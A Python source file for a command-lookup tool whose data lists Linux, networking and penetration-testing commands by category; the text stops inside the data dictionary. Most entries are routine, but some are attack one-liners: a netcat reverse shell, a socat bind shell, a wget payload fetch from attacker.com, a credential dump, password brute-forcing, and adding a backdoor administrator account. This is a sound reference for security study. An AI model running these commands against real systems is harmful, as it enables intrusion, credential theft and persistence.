#!/usr/bin/env python3
"""
CLI COMMAND LOOKUP
Usage:
    python cli_fer                 # browse all categories and tools
    python cli_fer <tool_name>     # show flags and examples for a specific tool
    python cli_fer --help          # this message
"""

import sys
import difflib

DATA = {
    "Linux Fundamentals": [
        {"name": "ls", "desc": "List directory contents",
         "flags": [("-l", "long format"), ("-a", "hidden files"), ("-h", "human-readable"), ("-R", "recursive"), ("-t", "sort by time")],
         "examples": ["ls -la /var/log", "ls -lhS /tmp"]},
        {"name": "cd", "desc": "Change directory",
         "flags": [("-", "previous directory"), ("..", "up one level"), ("~", "home")],
         "examples": ["cd /etc/apache2", "cd -"]},
        {"name": "find", "desc": "Search files in hierarchy",
         "flags": [("-name", "file pattern"), ("-type", "f/d"), ("-size", "size filter"), ("-mtime", "modified days"), ("-exec", "run command"), ("-perm", "permissions")],
         "examples": ["find / -name '*.conf' -type f 2>/dev/null", "find . -perm -4000 -ls"]},
        {"name": "grep", "desc": "Print lines matching patterns",
         "flags": [("-r", "recursive"), ("-i", "ignore case"), ("-v", "invert match"), ("-E", "extended regex"), ("-o", "only matching")],
         "examples": ["grep -r 'password' /etc/", "grep -E 'fatal|error' log.txt"]},
        {"name": "ps", "desc": "Snapshot of processes",
         "flags": [("aux", "BSD all"), ("-ef", "Unix all"), ("-eo", "custom format"), ("--forest", "tree")],
         "examples": ["ps aux | grep sshd", "ps -eo pid,ppid,user,cmd --sort=-%mem"]},
        {"name": "kill", "desc": "Send signal to process",
         "flags": [("-9", "SIGKILL"), ("-15", "SIGTERM"), ("-l", "list signals")],
         "examples": ["kill -9 1337", "pkill -f 'python myapp'"]},
        {"name": "chmod", "desc": "Change file mode bits",
         "flags": [("-R", "recursive"), ("+x", "executable"), ("u+s", "SUID"), ("g+w", "group write")],
         "examples": ["chmod 755 script.sh", "chmod u+s /usr/bin/passwd"]},
        {"name": "chown", "desc": "Change file owner/group",
         "flags": [("-R", "recursive")],
         "examples": ["chown root:admin /etc/shadow", "chown -R www-data:www-data /var/www"]},
        {"name": "systemctl", "desc": "Control systemd services",
         "flags": [("start/stop/restart", "control"), ("enable/disable", "boot"), ("status", "show status"), ("--failed", "failed units")],
         "examples": ["systemctl status sshd", "systemctl list-units --failed"]},
        {"name": "journalctl", "desc": "Query systemd journal",
         "flags": [("-u <unit>", "service logs"), ("--since '...'", "time filter"), ("-f", "follow"), ("-k", "kernel")],
         "examples": ["journalctl -u nginx --since '10 min ago'", "journalctl -f -k"]},
        {"name": "mount", "desc": "Mount filesystems",
         "flags": [("-t", "type"), ("-o", "options"), ("remount", "remount")],
         "examples": ["mount -t ext4 /dev/sda1 /mnt", "mount -o remount,rw /"]},
        {"name": "fdisk", "desc": "Manipulate disk partition table",
         "flags": [("-l", "list partitions"), ("/dev/...", "interactive")],
         "examples": ["fdisk -l", "fdisk /dev/sdb"]},
        {"name": "df", "desc": "Report disk space usage",
         "flags": [("-h", "human-readable"), ("-T", "type"), ("-i", "inodes")],
         "examples": ["df -hT", "df -i /tmp"]},
        {"name": "du", "desc": "Estimate file space usage",
         "flags": [("-h", "human-readable"), ("-s", "summarize"), ("--max-depth=N", "depth")],
         "examples": ["du -sh /var/log", "du -h --max-depth=1 /home"]},
        {"name": "env", "desc": "Show environment variables",
         "flags": [("VAR=value", "set variable"), ("-i", "ignore inherited env")],
         "examples": ["env", "env -i PATH=/bin /bin/bash"]},
    ],
    "Text Processing": [
        {"name": "cat", "desc": "Concatenate and print files",
         "flags": [("-n", "number lines"), ("-b", "number non-blank")],
         "examples": ["cat file.txt", "cat -n file1 file2"]},
        {"name": "head", "desc": "Output first part of files",
         "flags": [("-n <num>", "lines to output")],
         "examples": ["head -n 20 access.log"]},
        {"name": "tail", "desc": "Output last part of files",
         "flags": [("-n <num>", "lines"), ("-f", "follow")],
         "examples": ["tail -f /var/log/syslog"]},
        {"name": "grep", "desc": "Search patterns",
         "flags": [("-E", "extended regex"), ("-i", "ignore case"), ("-v", "invert"), ("-r", "recursive")],
         "examples": ["grep -i 'error' app.log", "grep -r 'TODO' src/"]},
        {"name": "awk", "desc": "Pattern scanning and processing",
         "flags": [("-F", "field separator"), ("'{print $1}'", "print field")],
         "examples": ["awk -F: '{print $1, $7}' /etc/passwd", "awk '/^GET/' access.log"]},
        {"name": "sed", "desc": "Stream editor for filtering and transforming text",
         "flags": [("-e 's/foo/bar/g'", "substitute"), ("-n", "suppress default output")],
         "examples": ["sed -e 's/error/warning/g' log.txt", "sed -n '5,10p' file"]},
        {"name": "cut", "desc": "Remove sections from lines",
         "flags": [("-d", "delimiter"), ("-f", "fields")],
         "examples": ["cut -d: -f1,3 /etc/passwd"]},
        {"name": "sort", "desc": "Sort lines of text",
         "flags": [("-n", "numeric"), ("-r", "reverse"), ("-u", "unique"), ("-k", "key")],
         "examples": ["sort -n -k2 data.txt", "sort -u list.txt"]},
        {"name": "uniq", "desc": "Report or omit repeated lines",
         "flags": [("-c", "prefix with count"), ("-d", "only duplicates")],
         "examples": ["sort file | uniq -c", "uniq -d sorted.txt"]},
        {"name": "tr", "desc": "Translate or delete characters",
         "flags": [("-d", "delete"), ("'[:lower:]' '[:upper:]'", "convert case")],
         "examples": ["echo 'hello' | tr 'a-z' 'A-Z'", "tr -d '\r' < windows.txt"]},
        {"name": "wc", "desc": "Word, line, character, byte count",
         "flags": [("-l", "lines"), ("-w", "words"), ("-c", "bytes")],
         "examples": ["wc -l file.txt", "wc -c binary.bin"]},
        {"name": "diff", "desc": "Compare files line by line",
         "flags": [("-u", "unified diff"), ("-r", "recursive")],
         "examples": ["diff -u file1 file2", "diff -r dir1 dir2"]},
    ],
    "Shell & Scripting": [
        {"name": "bash", "desc": "Bourne-Again SHell",
         "flags": [("<<<", "here-string"), ("$(...)", "command sub"), (">", "redirect"), ("|", "pipe"), ("&", "background")],
         "examples": ["bash -c 'for i in {1..5}; do echo $i; done'", "diff <(ls dir1) <(ls dir2)"]},
        {"name": "for loop", "desc": "Iterate over list",
         "flags": [("for i in ...; do ...; done", "standard")],
         "examples": ["for ip in $(seq 1 254); do ping -c1 192.168.1.$ip; done"]},
        {"name": "if condition", "desc": "Conditional execution",
         "flags": [("[ -f file ]", "file exists"), ("[ -x cmd ]", "executable")],
         "examples": ["if [ -f /etc/shadow ]; then echo 'Found shadow'; fi"]},
        {"name": "grep -v", "desc": "Inverted match (for filtering)", "flags": [], "examples": []},
        {"name": "export", "desc": "Set environment variable",
         "examples": ["export PATH=$PATH:/opt/custom/bin"]},
        {"name": "source / .", "desc": "Execute commands from a file in the current shell",
         "examples": [". ./env.sh", "source ~/.bashrc"]},
        {"name": "xargs", "desc": "Build and execute command lines from stdin",
         "examples": ["find . -name '*.txt' | xargs grep 'search'"]},
        {"name": "tee", "desc": "Read from stdin and write to stdout and files",
         "examples": ["./program | tee output.log"]},
    ],
    "Archives & Compression": [
        {"name": "tar", "desc": "Tape archiver",
         "flags": [("-cf", "create archive"), ("-xf", "extract"), ("-tf", "list"), ("-C", "directory"), ("-v", "verbose")],
         "examples": ["tar -czf archive.tar.gz /path/to/dir", "tar -xvf archive.tar -C /tmp"]},
        {"name": "gzip", "desc": "Compress or expand files",
         "flags": [("-d", "decompress"), ("-c", "to stdout")],
         "examples": ["gzip file.txt", "gzip -d file.gz"]},
        {"name": "zip", "desc": "Package and compress",
         "flags": [("-r", "recursive"), ("-e", "encrypt")],
         "examples": ["zip -r archive.zip folder/", "zip -e secret.zip file.txt"]},
        {"name": "7z", "desc": "7-Zip archiver",
         "flags": [("a", "add"), ("x", "extract with paths"), ("e", "extract (no paths)"), ("-p<pass>", "password")],
         "examples": ["7z a archive.7z file", "7z x encrypted.7z -psecret"]},
        {"name": "binwalk", "desc": "Firmware analysis tool – scan for embedded files",
         "flags": [("-e", "extract"), ("-M", "recursive extraction"), ("-D", "define extraction types")],
         "examples": ["binwalk -e firmware.bin", "binwalk -Me image.bin"]},
        {"name": "foremost", "desc": "File carving – recover files based on headers/footers",
         "flags": [("-t", "file types"), ("-o", "output dir")],
         "examples": ["foremost -t jpg,png -i disk.img", "foremost -t all -i evidence.dd -o recovered"]},
        {"name": "scalpel", "desc": "File carving (config-based)",
         "flags": [("-c", "config file"), ("-o", "output")],
         "examples": ["scalpel -c /etc/scalpel/scalpel.conf -o carved image.dd"]},
    ],
    "Networking Fundamentals": [
        {"name": "ip", "desc": "Show / manipulate routing, devices, tunnels",
         "flags": [("addr", "addresses"), ("link", "interfaces"), ("route", "routing table")],
         "examples": ["ip addr show", "ip route add 10.0.0.0/8 via 192.168.1.1"]},
        {"name": "ss", "desc": "Socket statistics (replaces netstat)",
         "flags": [("-tlnp", "TCP listening numeric PID"), ("-ua", "UDP all")],
         "examples": ["ss -tlnp", "ss -ua"]},
        {"name": "dig", "desc": "DNS lookup",
         "flags": [("+short", "terse"), ("ANY", "all records"), ("-x", "reverse")],
         "examples": ["dig google.com ANY", "dig -x 8.8.8.8 +short"]},
        {"name": "curl", "desc": "Transfer data from URLs",
         "flags": [("-X", "method"), ("-d", "data"), ("-H", "header"), ("-o", "output"), ("-k", "insecure SSL")],
         "examples": ["curl -X POST -d 'user=admin&pass=test' http://target.com/login", "curl -H 'Host: victim.com' http://10.10.10.5"]},
        {"name": "wget", "desc": "Non-interactive download",
         "flags": [("-r", "recursive"), ("-np", "no parent"), ("-O", "output")],
         "examples": ["wget -r http://target.com/files/", "wget -O payload.sh http://attacker.com/rev.sh"]},
        {"name": "ssh", "desc": "OpenSSH remote login client",
         "flags": [("-p", "port"), ("-i", "identity file"), ("-L", "local port forward"), ("-R", "remote forward"), ("-D", "SOCKS proxy")],
         "examples": ["ssh -i id_rsa user@10.10.10.10", "ssh -D 1080 user@target"]},
        {"name": "socat", "desc": "Multipurpose relay",
         "flags": [("TCP-LISTEN:<port>,fork", "listen"), ("TCP:<host>:<port>", "connect"), ("EXEC:", "execute")],
         "examples": ["socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash", "socat TCP4:192.168.1.10:80 SSL:target.com:443"]},
        {"name": "nc", "desc": "Netcat – arbitrary TCP/UDP connections",
         "flags": [("-l", "listen"), ("-p", "port"), ("-e", "execute"), ("-n", "no DNS")],
         "examples": ["nc -lvnp 4444", "nc -e /bin/sh 10.10.14.2 4444"]},
        {"name": "tcpdump", "desc": "Capture network packets",
         "flags": [("-i", "interface"), ("-n", "numeric"), ("-w", "write to file"), ("-r", "read"), ("'<bpf>'", "BPF filter")],
         "examples": ["tcpdump -i eth0 'host 192.168.1.1 and port 80' -w capture.pcap"]},
    ],
    "Web Enumeration": [
        {"name": "gobuster", "desc": "Directory/file & DNS brute-forcer",
         "flags": [("dir", "directory mode"), ("-u", "URL"), ("-w", "wordlist"), ("-x", "extensions"), ("-t", "threads")],
         "examples": ["gobuster dir -u http://target.com -w common.txt -x php,html"]},
        {"name": "ffuf", "desc": "Fast web fuzzer",
         "flags": [("-u", "URL with FUZZ"), ("-w", "wordlist"), ("-mc", "match HTTP codes"), ("-H", "custom header")],
         "examples": ["ffuf -u http://target.com/FUZZ -w wordlist -mc 200,301"]},
        {"name": "wfuzz", "desc": "Web application fuzzer",
         "flags": [("-c", "colored output"), ("-z", "payload"), ("--hc", "hide codes")],
         "examples": ["wfuzz -c -z file,common.txt --hc 404 http://target.com/FUZZ"]},
        {"name": "feroxbuster", "desc": "Simple, fast, recursive content discovery",
         "flags": [("-u", "URL"), ("-w", "wordlist"), ("-x", "extensions"), ("-n", "no recursion"), ("-t", "threads")],
         "examples": ["feroxbuster -u http://target.com -w /usr/share/seclists/Discovery/Web-Content/common.txt"]},
        {"name": "nikto", "desc": "Web server scanner",
         "flags": [("-h", "host"), ("-p", "port"), ("-ssl", "force SSL")],
         "examples": ["nikto -h http://target.com", "nikto -h https://target.com -p 8443"]},
        {"name": "whatweb", "desc": "Website fingerprinting",
         "flags": [("-a", "aggression level"), ("--no-errors", "suppress errors")],
         "examples": ["whatweb target.com", "whatweb -a 3 192.168.1.0/24"]},
        {"name": "sqlmap", "desc": "Automatic SQL injection tool",
         "flags": [("-u", "URL"), ("--data", "POST data"), ("--dbs", "enumerate databases"), ("--os-shell", "OS shell")],
         "examples": ["sqlmap -u 'http://target.com/page?id=1' --dbs", "sqlmap -u 'http://target.com/login' --data='user=admin&pass=test' --os-shell"]},
        {"name": "subfinder", "desc": "Passive subdomain discovery",
         "flags": [("-d", "domain"), ("-silent", "quiet")],
         "examples": ["subfinder -d example.com"]},
        {"name": "amass", "desc": "In-depth attack surface mapping and subdomain enumeration",
         "flags": [("enum -d", "domain enumeration"), ("intel", "intel gathering")],
         "examples": ["amass enum -d example.com -o subs.txt"]},
    ],
    "Cryptography": [
        {"name": "base64", "desc": "Base64 encode/decode",
         "flags": [("-d", "decode"), ("-w0", "no line wrapping")],
         "examples": ["echo 'hello' | base64", "echo 'aGVsbG8=' | base64 -d"]},
        {"name": "xxd", "desc": "Hex dump or convert",
         "flags": [("-p", "plain hexdump"), ("-r", "reverse")],
         "examples": ["xxd -p file.bin", "echo '48656c6c6f' | xxd -r -p"]},
        {"name": "openssl", "desc": "Cryptography toolkit",
         "flags": [("enc", "encryption"), ("dgst", "hashing"), ("rsa", "RSA commands"), ("x509", "certificates")],
         "examples": ["openssl enc -aes-256-cbc -in file -out file.enc", "openssl dgst -sha256 file"]},
        {"name": "gpg", "desc": "GNU Privacy Guard",
         "flags": [("-c", "symmetric encryption"), ("-e", "encrypt"), ("-d", "decrypt")],
         "examples": ["gpg -c secret.txt", "gpg -d secret.gpg"]},
        {"name": "hash-identifier", "desc": "Identify hash types",
         "flags": [("interactive", "paste hash")],
         "examples": ["hash-identifier"]},
        {"name": "RsaCtfTool", "desc": "RSA attack tool",
         "flags": [("--publickey", "key file"), ("--decryptfile", "output"), ("--attack", "chosen attack")],
         "examples": ["python3 RsaCtfTool.py --publickey key.pub --decryptfile cipher.enc"]},
        {"name": "cewl", "desc": "Custom word list generator from website",
         "flags": [("-d", "depth"), ("-w", "output file")],
         "examples": ["cewl http://target.com -w words.txt"]},
        {"name": "john", "desc": "John the Ripper (cryptography section)",
         "flags": [("--wordlist=", "dictionary"), ("--format=", "hash type")],
         "examples": ["john --wordlist=rockyou.txt --format=raw-md5 hashes.txt"]},
    ],
    "Password Attacks": [
        {"name": "hashcat", "desc": "Advanced password recovery",
         "flags": [("-m", "hash type"), ("-a", "attack mode"), ("-w", "workload profile"), ("--force", "ignore warnings")],
         "examples": ["hashcat -m 0 -a 0 hashes.txt rockyou.txt", "hashcat -m 1000 -a 3 ntlm.txt ?l?l?l?l?l?l?l?l"]},
        {"name": "john", "desc": "John the Ripper",
         "flags": [("--wordlist=", "dictionary"), ("--format=", "hash format"), ("--show", "cracked passwords")],
         "examples": ["john --wordlist=rockyou.txt hashes.txt", "john --format=raw-md5 --show hashes.txt"]},
        {"name": "hydra", "desc": "Network logon cracker",
         "flags": [("-l", "username"), ("-P", "password file"), ("-t", "tasks"), ("-f", "first found exit")],
         "examples": ["hydra -l admin -P pass.txt ssh://10.10.10.10", "hydra -L users.txt -P pass.txt http-post-form '/login.php:user=^USER^&pass=^PASS^:F=error'"]},
        {"name": "medusa", "desc": "Parallel login brute-forcer",
         "flags": [("-h", "target"), ("-U", "user file"), ("-P", "pass file"), ("-M", "module")],
         "examples": ["medusa -h 10.0.0.5 -U users.txt -P pass.txt -M ssh"]},
        {"name": "crunch", "desc": "Wordlist generator",
         "flags": [("<min> <max>", "length range"), ("-t", "pattern"), ("-o", "output")],
         "examples": ["crunch 4 6 0123456789 -o nums.txt"]},
        {"name": "rsg", "desc": "Random String Generator (from pwgen family)",
         "examples": ["rsg -c -n 100 -l 8"]},
    ],
    "Reverse Engineering": [
        {"name": "strings", "desc": "Print printable strings in files",
         "flags": [("-n", "min length"), ("-e", "encoding"), ("-t o", "offset")],
         "examples": ["strings -n 8 binary", "strings -e l /proc/kcore"]},
        {"name": "objdump", "desc": "Display information from object files",
         "flags": [("-d", "disassemble"), ("-t", "symbol table"), ("-M", "intel syntax")],
         "examples": ["objdump -d -M intel binary", "objdump -t a.out"]},
        {"name": "radare2", "desc": "Portable reversing framework",
         "flags": [("-A", "analyse all"), ("-d", "debug"), ("-c", "command")],
         "examples": ["radare2 -A binary", "radare2 -d -c 'db main; dc' ./vuln"]},
        {"name": "gdb", "desc": "GNU Debugger with pwndbg/gef",
         "flags": [("-q", "quiet"), ("-x", "execute script"), ("--args", "program args")],
         "examples": ["gdb -q ./exploit_me", "gdb --args ./binary $(python3 -c 'print(\"A\"*100)')"]},
        {"name": "readelf", "desc": "Display ELF file info",
         "flags": [("-a", "all"), ("-h", "header"), ("-S", "sections")],
         "examples": ["readelf -a binary"]},
        {"name": "strace", "desc": "Trace system calls and signals",
         "flags": [("-f", "follow forks"), ("-e", "filter"), ("-o", "output file")],
         "examples": ["strace -f ./program", "strace -e open ./prog"]},
        {"name": "ltrace", "desc": "Trace library calls",
         "flags": [("-f", "follow"), ("-e", "filter")],
         "examples": ["ltrace ./program"]},
        {"name": "binwalk", "desc": "Firmware analysis, extract embedded files",
         "flags": [("-e", "extract"), ("-M", "recursive")],
         "examples": ["binwalk -e firmware.bin"]},
        {"name": "upx", "desc": "UPX executable packer/unpacker",
         "flags": [("-d", "unpack"), ("-l", "list info")],
         "examples": ["upx -d packed.exe"]},
    ],
    "Binary Exploitation": [
        {"name": "checksec", "desc": "Check binary security features (pwntools)",
         "examples": ["checksec --file=binary"]},
        {"name": "ROPgadget", "desc": "Find ROP gadgets in binaries",
         "flags": [("--binary", "target binary"), ("--ropchain", "generate chain")],
         "examples": ["ROPgadget --binary vuln"]},
        {"name": "Ropper", "desc": "ROP gadget finder",
         "flags": [("--file", "binary"), ("--search 'syscall'", "search gadget")],
         "examples": ["ropper --file vuln --search 'pop rdi'"]},
        {"name": "one_gadget", "desc": "Find execve('/bin/sh') in libc",
         "examples": ["one_gadget /lib/x86_64-linux-gnu/libc.so.6"]},
        {"name": "pwntools", "desc": "CTF framework & exploit development",
         "examples": ["python3 -c 'from pwn import *; print(asm(shellcraft.sh()))'"]},
        {"name": "gdb-pwndbg", "desc": "pwndbg enhanced GDB",
         "examples": ["gdb -q ./binary -x /path/to/pwndbg/gdbinit.py"]},
    ],
    "Forensics": [
        {"name": "dd", "desc": "Convert and copy files (imaging)",
         "flags": [("if=", "input"), ("of=", "output"), ("bs=", "block size"), ("count=", "blocks")],
         "examples": ["dd if=/dev/sda of=image.dd bs=4M conv=noerror,sync"]},
        {"name": "dcfldd", "desc": "Forensic dd with hashing",
         "flags": [("if=", "input"), ("of=", "output"), ("hash=", "algorithm")],
         "examples": ["dcfldd if=/dev/sdb of=usb.img hash=sha256 statusprogress"]},
        {"name": "mmls", "desc": "Display partition layout (The Sleuth Kit)",
         "flags": [("-t", "volume type")],
         "examples": ["mmls image.dd"]},
        {"name": "fls", "desc": "List files in image (TSK)",
         "flags": [("-r", "recurse"), ("-m", "mount prefix")],
         "examples": ["fls -r -f ext4 image.dd"]},
        {"name": "icat", "desc": "Extract file by inode (TSK)",
         "examples": ["icat -f ext4 image.dd 1176 > recovered.txt"]},
        {"name": "volatility3", "desc": "Memory forensics framework",
         "flags": [("-f", "memory image"), ("windows.info", "module"), ("windows.psscan", "process scan")],
         "examples": ["vol -f memory.dmp windows.info", "vol -f memory.dmp windows.psscan"]},
        {"name": "strings", "desc": "Extract strings from file",
         "flags": [("-n", "min length"), ("-e", "encoding")],
         "examples": ["strings -n 10 image.dd > strings.txt"]},
        {"name": "exiftool", "desc": "Read/write metadata",
         "flags": [("-a", "all metadata"), ("-g", "group by type")],
         "examples": ["exiftool -a image.jpg", "exiftool -all= file.pdf"]},
        {"name": "testdisk", "desc": "Partition recovery tool",
         "examples": ["testdisk /dev/sdb"]},
        {"name": "photorec", "desc": "File carver (part of TestDisk)",
         "examples": ["photorec /dev/sdb"]},
    ],
    "Steganography": [
        {"name": "steghide", "desc": "Hide/extract data in images/audio",
         "flags": [("embed", "hide"), ("extract", "retrieve"), ("-sf", "stego file"), ("-p", "passphrase")],
         "examples": ["steghide embed -cf cover.jpg -ef secret.txt", "steghide extract -sf stego.jpg -p pass"]},
        {"name": "zsteg", "desc": "Detect stego data in PNG/BMP",
         "examples": ["zsteg image.png", "zsteg -a image.png"]},
        {"name": "binwalk", "desc": "Scan for embedded files (stego)",
         "flags": [("-e", "extract")],
         "examples": ["binwalk -e stego.jpg"]},
        {"name": "exiftool", "desc": "Extract metadata (possible hidden)",
         "examples": ["exiftool suspicious.jpg"]},
        {"name": "strings", "desc": "Look for readable data",
         "examples": ["strings -n 8 file.wav"]},
    ],
    "Active Directory": [
        {"name": "impacket-secretsdump", "desc": "Dump credentials from remote Windows",
         "flags": [("<domain>/<user>[:pass]@<target>", "authenticate")],
         "examples": ["secretsdump.py corp.local/admin:Passw0rd@10.10.10.100"]},
        {"name": "impacket-GetNPUsers", "desc": "AS-REP roasting",
         "examples": ["GetNPUsers.py corp.local/ -usersfile users.txt -format hashcat"]},
        {"name": "crackmapexec", "desc": "Swiss army knife for pen-testing AD",
         "flags": [("smb", "SMB protocol"), ("winrm", "WinRM"), ("-u", "user"), ("-p", "pass"), ("--shares", "list shares")],
         "examples": ["crackmapexec smb 10.10.10.0/24 -u admin -p password"]},
        {"name": "smbclient", "desc": "SMB/CIFS access client",
         "flags": [("-L", "list shares"), ("-N", "no password"), ("-U", "user")],
         "examples": ["smbclient -L //10.10.10.5 -N"]},
        {"name": "rpcclient", "desc": "MS-RPC client (enumeration)",
         "flags": [("-U", "user"), ("-c", "command")],
         "examples": ["rpcclient -U '' -N 10.10.10.10 -c 'enumdomusers'"]},
        {"name": "bloodhound-python", "desc": "BloodHound data collector (Python)",
         "flags": [("-c", "collection method"), ("-d", "domain"), ("-u", "user"), ("-p", "pass")],
         "examples": ["bloodhound-python -c all -d corp.local -u admin -p pass -dc dc01.corp.local"]},
        {"name": "kerbrute", "desc": "Kerberos brute-force and enumeration",
         "flags": [("userenum", "user enumeration"), ("bruteuser", "brute force")],
         "examples": ["kerbrute userenum -d corp.local users.txt"]},
        {"name": "netexec", "desc": "Network execution tool (formerly CrackMapExec)",
         "examples": ["netexec smb 192.168.1.0/24 -u user -p pass --shares"]},
    ],
    "Windows Internals": [
        {"name": "powershell", "desc": "Windows PowerShell",
         "flags": [("-Command", "execute command"), ("-ExecutionPolicy Bypass", "bypass policy")],
         "examples": ["powershell -Command Get-Process", r"powershell -ep bypass .\script.ps1"]},
        {"name": "reg", "desc": "Registry console tool",
         "flags": [("query", "query a key"), ("export", "export key"), ("add", "add/change value")],
         "examples": ["reg query HKLM\\Software", "reg export HKLM\\SAM sam.reg"]},
        {"name": "schtasks", "desc": "Scheduled tasks management",
         "flags": [("/query", "list tasks"), ("/create", "create task"), ("/delete", "delete")],
         "examples": ["schtasks /query /fo LIST /v", "schtasks /create /tn 'Updater' /tr 'C:\\evil.exe' /sc daily"]},
        {"name": "sc", "desc": "Service Control Manager",
         "flags": [("query", "list services"), ("stop/start", "control")],
         "examples": ["sc query", "sc stop 'Spooler'"]},
        {"name": "tasklist", "desc": "List processes",
         "flags": [("/v", "verbose"), ("/fi", "filter")],
         "examples": ["tasklist /v", "tasklist /fi \"STATUS eq running\""]},
        {"name": "net user", "desc": "Manage local/domain users",
         "examples": ["net user", "net user hacker P@ssw0rd /add", "net localgroup administrators hacker /add"]},
        {"name": "ipconfig", "desc": "IP configuration",
         "flags": [("/all", "detailed info"), ("/displaydns", "DNS cache")],
         "examples": ["ipconfig /all", "ipconfig /displaydns"]},
    ],
    "Linux Privilege Escalation": [
        {"name": "sudo -l", "desc": "List allowed sudo commands",
         "examples": ["sudo -l"]},
        {"name": "find -perm", "desc": "Search for SUID/SGID files",
         "examples": ["find / -perm -4000 -type f 2>/dev/null", "find / -perm -2000 -type f 2>/dev/null"]},
        {"name": "linpeas", "desc": "Linux enumeration script (PEASS)",
         "examples": ["./linpeas.sh"]},
        {"name": "linux-exploit-suggester", "desc": "Suggest exploits based on kernel version",
         "examples": ["./linux-exploit-suggester.sh"]},
        {"name": "pspy", "desc": "Unprivileged process snooping",
         "examples": ["./pspy64"]},
        {"name": "getcap", "desc": "List capabilities of binaries",
         "examples": ["getcap -r / 2>/dev/null"]},
        {"name": "crontab -l", "desc": "List user cron jobs",
         "examples": ["crontab -l", "ls -la /etc/cron*"]},
    ],
    "Cloud Security": [
        {"name": "aws", "desc": "AWS CLI",
         "flags": [("s3", "S3 commands"), ("iam", "IAM commands"), ("ec2", "EC2"), ("--profile", "profile")],
         "examples": ["aws s3 ls s3://bucket-name", "aws iam list-users"]},
        {"name": "gcloud", "desc": "Google Cloud CLI",
         "examples": ["gcloud compute instances list", "gcloud auth list"]},
        {"name": "az", "desc": "Azure CLI",
         "examples": ["az vm list", "az ad user list"]},
        {"name": "bucket_finder", "desc": "Find public S3 buckets",
         "examples": ["ruby bucket_finder.rb wordlist.txt"]},
        {"name": "CloudBrute", "desc": "Multi-cloud brute-forcer for buckets/endpoints",
         "examples": ["./CloudBrute -d target.com -k keywords.txt"]},
    ],
    "Containers": [
        {"name": "docker", "desc": "Container management",
         "flags": [("ps", "list containers"), ("exec", "execute in container"), ("run", "create and start"), ("images", "list images")],
         "examples": ["docker ps -a", "docker exec -it container_id bash"]},
        {"name": "kubectl", "desc": "Kubernetes CLI",
         "flags": [("get pods", "list pods"), ("exec", "execute in pod"), ("describe", "details"), ("config view", "view kubeconfig")],
         "examples": ["kubectl get pods --all-namespaces", "kubectl exec -it pod -- /bin/sh"]},
        {"name": "cdk", "desc": "Container penetration toolkit",
         "examples": ["./cdk eva", "./cdk run <module>"]},
        {"name": "amicontained", "desc": "Check container runtime/security",
         "examples": ["./amicontained"]},
        {"name": "deepce", "desc": "Docker enumeration & exploitation",
         "examples": ["./deepce.sh"]},
    ],
    "Mobile Security": [
        {"name": "apktool", "desc": "Reverse engineer APK files",
         "flags": [("d", "decode APK"), ("b", "build APK")],
         "examples": ["apktool d app.apk"]},
        {"name": "jadx", "desc": "Dex to Java decompiler (GUI/CLI)",
         "flags": [("-d", "output dir"), ("--deobf", "deobfuscation")],
         "examples": ["jadx -d output app.apk"]},
        {"name": "adb", "desc": "Android Debug Bridge",
         "flags": [("devices", "list devices"), ("shell", "open shell"), ("push/pull", "file transfer")],
         "examples": ["adb shell", "adb pull /data/data/com.app/app.db"]},
        {"name": "frida", "desc": "Dynamic instrumentation toolkit",
         "flags": [("-U", "USB device"), ("-l", "load script"), ("-f", "spawn app")],
         "examples": ["frida -U -l script.js com.example.app"]},
        {"name": "objection", "desc": "Runtime mobile exploration (based on Frida)",
         "examples": ["objection -g com.app explore"]},
    ],
    "OSINT": [
        {"name": "theHarvester", "desc": "Email, subdomain, name gathering",
         "flags": [("-d", "domain"), ("-b", "data source"), ("-f", "output file")],
         "examples": ["theHarvester -d target.com -b google"]},
        {"name": "recon-ng", "desc": "Web reconnaissance framework",
         "examples": ["recon-ng", "recon-cli -m discover/info_disclosure/cache_snoop"]},
        {"name": "sherlock", "desc": "Hunt down social media accounts by username",
         "examples": ["sherlock username"]},
        {"name": "spiderfoot", "desc": "Automated OSINT scanner",
         "examples": ["spiderfoot -l 127.0.0.1:5001 (web interface)"]},
        {"name": "waybackurls", "desc": "Fetch URLs from the Wayback Machine",
         "examples": ["waybackurls target.com"]},
        {"name": "builtwith", "desc": "Technology profiler (API)",
         "examples": ["builtwith -d target.com"]},
    ],
    "Git": [
        {"name": "git log", "desc": "Show commit logs",
         "flags": [("-p", "patch"), ("--oneline", "compact"), ("--all", "all branches")],
         "examples": ["git log -p"]},
        {"name": "git show", "desc": "Show various Git objects",
         "examples": ["git show <commit>"]},
        {"name": "git diff", "desc": "Show changes between commits",
         "examples": ["git diff HEAD~1"]},
        {"name": "git-credential-helper", "desc": "Retrieve stored credentials",
         "examples": ["git credential-manager get"]},
        {"name": "gitleaks", "desc": "Secrets scanning in Git repos",
         "examples": ["gitleaks detect --source ."]},
        {"name": "truffleHog", "desc": "Searches through git repositories for secrets",
         "examples": ["trufflehog git file:///path/to/repo"]},
    ],
    "Scripting Helpers": [
        {"name": "python3 -c", "desc": "Execute Python one-liner",
         "examples": ["python3 -c 'print(open(\"file\").read())'"]},
        {"name": "perl -e", "desc": "Execute Perl one-liner",
         "examples": ["perl -e 'print \"A\"x100'"]},
        {"name": "jq", "desc": "Command-line JSON processor",
         "flags": [("-r", "raw output"), ("'.key'", "extract field"), ("'.[] | select(.status==\"open\")'", "filter")],
         "examples": ["curl -s api.example.com | jq .data", "cat file.json | jq '.[] | {id: .id, title: .title}'"]},
        {"name": "yq", "desc": "YAML/XML processor",
         "examples": ["yq eval '.services' docker-compose.yml"]},
        {"name": "xargs", "desc": "Construct commands from stdin",
         "flags": [("-I{}", "replace string"), ("-P", "parallel")],
         "examples": ["cat urls.txt | xargs -I{} curl {} -o output"]},
        {"name": "parallel", "desc": "Run commands in parallel",
         "flags": [("--jobs", "number of jobs")],
         "examples": ["parallel -j 10 curl :::: urls.txt"]},
    ],
    "Misc Utilities": [
        {"name": "tmux", "desc": "Terminal multiplexer",
         "examples": ["tmux new -s session", "tmux attach -t session"]},
        {"name": "screen", "desc": "Terminal multiplexer (older)",
         "examples": ["screen -S session"]},
        {"name": "script", "desc": "Record terminal session",
         "examples": ["script session.log"]},
        {"name": "watch", "desc": "Execute a program periodically",
         "flags": [("-n", "interval")],
         "examples": ["watch -n 1 ls -la"]},
        {"name": "md5sum", "desc": "Compute MD5 checksum",
         "examples": ["md5sum file.iso"]},
        {"name": "sha256sum", "desc": "Compute SHA256 checksum",
         "examples": ["sha256sum file.iso"]},
        {"name": "file", "desc": "Determine file type",
         "examples": ["file unknown.dat"]},
